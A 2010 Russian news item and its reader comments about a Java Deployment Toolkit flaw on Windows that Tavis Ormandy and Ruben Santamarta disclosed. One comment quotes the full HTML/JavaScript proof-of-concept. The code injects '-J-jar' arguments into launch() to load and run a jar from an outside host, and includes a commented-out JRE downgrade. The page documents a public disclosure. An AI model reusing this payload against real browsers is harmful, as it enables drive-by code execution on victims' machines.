Программная “дыра” в Java делает пользователей Windows уязвимыми перед хакерами

Тревожные известия пришли для пользователей компьютеров под управлением операционной системы Windows. Сразу из двух источников появились сообщения об обнаружении в технологии Java новой уязвимости, которая может использоваться хакерами для атак на Windows PC. Причем, для осуществления такой атаки пользователям достаточно посетить веб-страницу с вредоносным кодом.

Специалист Google Тавис Орманди (Tavis Ormandy) и работник компании Wintercore Рубен Сантамарта (Ruben Santamarta) независимо друг от друга опубликовали в различных источниках подробности о данной уязвимости. По их словам, проблема связана с фреймворком Java Web Start, позволяющим разработчикам легко создавать Java приложения. При этом Тавис Орманди подчеркивает, что отключение данного Java плагина отнюдь не является панацеей от хакерских атак.

По данным специалистов, с помощью указанной уязвимости (которую, кстати, оказалось очень легко обнаружить) злоумышленник способен передавать произвольные параметры в утилиту и, в конечном счете, получать контроль над системой. В блоге Threat Post лаборатории Касперского говорится, что эта уязвимость может использоваться на всех актуальных версиях Windows, а также в популярных браузерах, включая Firefox, Internet Explorer и Chrome.

Тавис Орманди отмечает, что он проинформировал разработчиков технологии Java Web Start из Sun Microsystems об обнаруженной проблеме. Однако ему сообщили, что в компании не считают приоритет данной уязвимости достаточно высоким, чтобы выпустить патч для нее вне стандартного квартального цикла.

12.04.2010
Источник

 

О_о Ссылку на код в студию.

 

Удалаю java к чертям )))

 

Windows делает пользователей Windows уязвимыми перед хакерами

 

Ссылки на код нет

 

повсюду одни дыры..
до этого новость была про 25 дыр.. в вин

 

дырка в java, при чём тут windows?

 

А они опубликуют место с дырочкой или так, попугать решили?

 

http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1

HTML:

<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
    <script>
        // Tavis Ormandy <[email protected]>, April 2010

        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");

            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

            // Trigger the bug
            o.launch(u);
        } else {
            // Mozilla
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);

            // Test both MIME types
            try {
                // Old type
                o.launch(u);
            } catch (e) {
                // New type
                n.launch(u);
            }
        }

        // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
        // this classic exploit?
        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1

        // o.installJRE("1.4.2_18");
    </script>
</body>
</html>

 

вдуватели и сюда добрались
лиж бы дыру найти

 

Как модем поменяю, перейду на убунту. А то стоит и свой длинк настроить немогу.

 

дыра снова...

 

пипец !!! че за херню выложили на топике, что у меня антивирс так жестко реагирует на это?
ложная тревога или "по делу" ?

 

года два или три назад,
платёжные системы наотрез отказались от Явы,
которую использовали для идентификации клиентов.

сочли, что запускать аппликации на компе клиента - нарушает безопасность.

за ненадобностью хакерам - код сплойта нашёл путь в массы кракеров.

 

java...
хмм. читал книгу на eng и там написано было, что один из неуязвимым считается java и php. , и что и них нельзя вызывать переполнение буфера..
херня какая то.